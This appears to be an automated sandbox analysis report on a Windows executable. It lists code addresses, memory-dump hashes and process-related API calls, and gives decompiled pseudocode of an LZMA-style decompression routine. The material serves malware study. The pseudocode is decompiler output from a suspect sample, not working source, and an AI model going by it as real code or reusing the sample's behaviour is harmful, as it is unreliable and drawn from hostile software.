0x00406abc
0x00406abf
0x00406ac2
0x00406ada
0x00406add
0x00406ae0
0x00406ae3
0x00406ae3
0x00406ae6
0x00406aea
0x00406aec
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad5
0x00406ad5
0x00406aef
0x00406af6
0x00406af9
0x00000000
0x00406afb
0x00406afb
0x00000000
0x00406afb
0x00406af9
0x00406b00
0x00406b00
0x00406b00
0x00406b00
0x00000000
0x00000000
0x00406b3b
0x00406b3b
0x00406b3f
0x00407147
0x00407147
0x00000000
0x00407147
0x00406b45
0x00406b45
0x00406b48
0x00406b4b
0x00406b4f
0x00406b52
0x00406b58
0x00406b5a
0x00406b5a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b66
0x00406b04
0x00406b04
0x00406b07
0x00000000
0x00406b07
0x00406b68
0x00406b68
0x00406b6b
0x00406b6e
0x00406b71
0x00406b74
0x00406b77
0x00406b7a
0x00406b7d
0x00406b80
0x00406b83
0x00406b86
0x00406b9e
0x00406ba1
0x00406ba4
0x00406ba7
0x00406ba7
0x00406baa
0x00406bae
0x00406bb0
0x00406b88
0x00406b88
0x00406b90
0x00406b95
0x00406b97
0x00406b99
0x00406b99
0x00406bb3
0x00406bba
0x00406bbd
0x00000000
0x00406bbf
0x00406bbf
0x00000000
0x00406bbf
0x00000000
0x00406e4c
0x00406e4c
0x00406e50
0x00407177
0x00407177
0x00000000
0x00407177
0x00406e56
0x00406e56
0x00406e59
0x00406e5c
0x00406e60
0x00406e63
0x00406e69
0x00406e6b
0x00406e6b
0x00406e6b
0x00406e6e
0x00000000
0x00000000
0x00406c1c
0x00406c1c
0x00406c1f
0x00000000
0x00000000
0x00406f5b
0x00406f5b
0x00406f5f
0x00406f81
0x00406f81
0x00406f84
0x00406f8e
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00406f61
0x00406f61
0x00406f64
0x00406f68
0x00406f6b
0x00406f6b
0x00406f6e
0x00000000
0x00000000
0x00407018
0x00407018
0x0040701c
0x0040703a
0x0040703a
0x0040703a
0x0040703a
0x00407041
0x00407048
0x0040704f
0x0040704f
0x00407056
0x00407059
0x00407060
0x00000000
0x00407063
0x0040701e
0x0040701e
0x00407021
0x00407024
0x00407027
0x0040702e
0x00406f72
0x00406f72
0x00406f75
0x00000000
0x00000000
0x00407109
0x00407109
0x0040710c
0x0040700d
0x0040700d
0x0040700d
0x00000000
0x00407013
0x00000000
0x00406d43
0x00406d43
0x00406d45
0x00406d4c
0x00406d4d
0x00406d4f
0x00406d52
0x00000000
0x00000000
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00407060
0x00000000
0x00407063
0x00000000
0x00000000
0x00000000
0x00406d88
0x00406d88
0x00406d8b
0x00406dc1
0x00406dc1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef4
0x00406ef7
0x00406ef9
0x00407183
0x00407183
0x00000000
0x00407183
0x00406eff
0x00406eff
0x00406f02
0x00000000
0x00000000
0x00406f08
0x00406f08
0x00406f0c
0x00406f0f
0x00406f0f
0x00406f0f
0x00000000
0x00406f0f
0x00406d8d
0x00406d8d
0x00406d8f
0x00406d91
0x00406d93
0x00406d96
0x00406d97
0x00406d99
0x00406d9b
0x00406d9e
0x00406da1
0x00406db7
0x00406db7
0x00406dbc
0x00406df4
0x00406df4
0x00406df8
0x00406e21
0x00406e24
0x00406e26
0x00406e2d
0x00406e30
0x00406e33
0x00406e33
0x00406e38
0x00406e38
0x00406e3a
0x00406e3d
0x00406e44
0x00406e47
0x00406e74
0x00406e74
0x00406e77
0x00406e7a
0x00406eee
0x00406eee
0x00406eee
0x00406eee
0x00000000
0x00406eee
0x00406e7c
0x00406e7c
0x00406e82
0x00406e85
0x00406e88
0x00406e8b
0x00406e8e
0x00406e91
0x00406e94
0x00406e97
0x00406e9a
0x00406e9d
0x00406eb6
0x00406eb8
0x00406ebb
0x00406ebc
0x00406ebf
0x00406ec1
0x00406ec4
0x00406ec6
0x00406ec8
0x00406ecb
0x00406ecd
0x00406ed0
0x00406ed4
0x00406ed6
0x00406ed6
0x00406ed7
0x00406eda
0x00406edd
0x00406e9f
0x00406e9f
0x00406ea7
0x00406eac
0x00406eae
0x00406eb1
0x00406eb1
0x00406ee0
0x00406ee7
0x00406e71
0x00406e71
0x00406e71
0x00406e71
0x00000000
0x00406ee9
0x00406ee9
0x00000000
0x00406ee9
0x00406ee7
0x00406dfa
0x00406dfa
0x00406dfd
0x00406dff
0x00406e02
0x00406e05
0x00406e08
0x00406e0a
0x00406e0d
0x00406e10
0x00406e10
0x00406e13
0x00406e13
0x00406e16
0x00406e1d
0x00406df1
0x00406df1
0x00406df1
0x00406df1
0x00000000
0x00406e1f
0x00406e1f
0x00000000
0x00406e1f
0x00406e1d
0x00406da3
0x00406da3
0x00406da6
0x00406da8
0x00406dab
0x00000000
0x00000000
0x00406b0a
0x00406b0a
0x00406b0e
0x00407153
0x00407153
0x00000000
0x00407153
0x00406b14
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b28
0x00406b2b
0x00406b2e
0x00406b31
0x00406b33
0x00406b33
0x00406b33
0x00000000
0x00000000
0x00406c95
0x00406c95
0x00406c99
0x0040715f
0x0040715f
0x00000000
0x0040715f
0x00406c9f
0x00406c9f
0x00406ca2
0x00406ca5
0x00406ca8
0x00406caa
0x00406caa
0x00406caa
0x00406cad
0x00406cb0
0x00406cb3
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbd
0x00406cbf
0x00406cbf
0x00406cbf
0x00406cc2
0x00406cc5
0x00406cc8
0x00406ccb
0x00406ccb
0x00406ccb
0x00406cce
0x00406cd0
0x00406cd0
0x00000000
0x00000000
0x00406f12
0x00406f12
0x00406f12
0x00406f16
0x00000000
0x00000000
0x00406f1c
0x00406f1c
0x00406f1f
0x00406f22
0x00406f25
0x00406f27
0x00406f27
0x00406f27
0x00406f2a
0x00406f2d
0x00406f30
0x00406f33
0x00406f36
0x00406f39
0x00406f3a
0x00406f3c
0x00406f3c
0x00406f3c
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4b
0x00406f4f
0x00406f51
0x00406f54
0x00000000
0x00406f56
0x00406f56
0x00406cd3
0x00406cd3
0x00000000
0x00406cd3
0x00406f54
0x00407189
0x00407189
0x00000000
0x00000000
0x004067b8
0x004071c0
0x004071c0
0x00000000
0x004071c0
0x0040700d
0x0040708d
0x00407056

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cc43af0f3dc7360b650843029f4fb37e98cf8e44e9d3f0eb3b9d5ec05d02dde
Instruction ID: 56db4e79aaf5e8580c905796a14d264bc3fb4972df64c765fca97ee639103a5c
Opcode Fuzzy Hash: 8cc43af0f3dc7360b650843029f4fb37e98cf8e44e9d3f0eb3b9d5ec05d02dde
Instruction Fuzzy Hash: 87A15531E04229CBDF28CFA8C8446ADBBB1FF44305F14812ED856BB281C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 003D0034, Relevance: 5.2, APIs: 3, Instructions: 712processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 003D058C
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 003D05D3
TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 003D08ED

Memory Dump Source

Source File: 00000004.00000002.2162147549.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: Process$CreateMemoryReadTerminate
String ID:
API String ID: 2831168122-0
Opcode ID: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction ID: 28fdc297be09978ea29c1673aedc2cca57ed6d510e15fc3ba040acdeb84b6557
Opcode Fuzzy Hash: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction Fuzzy Hash: 16525E36E50258EEEB65CB94EC55BFDB7B5AF48B00F204496E608FA2A0D3705E80DF05

Uniqueness

Uniqueness Score: -1.00%

Function 00406F5B, Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406F5B() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
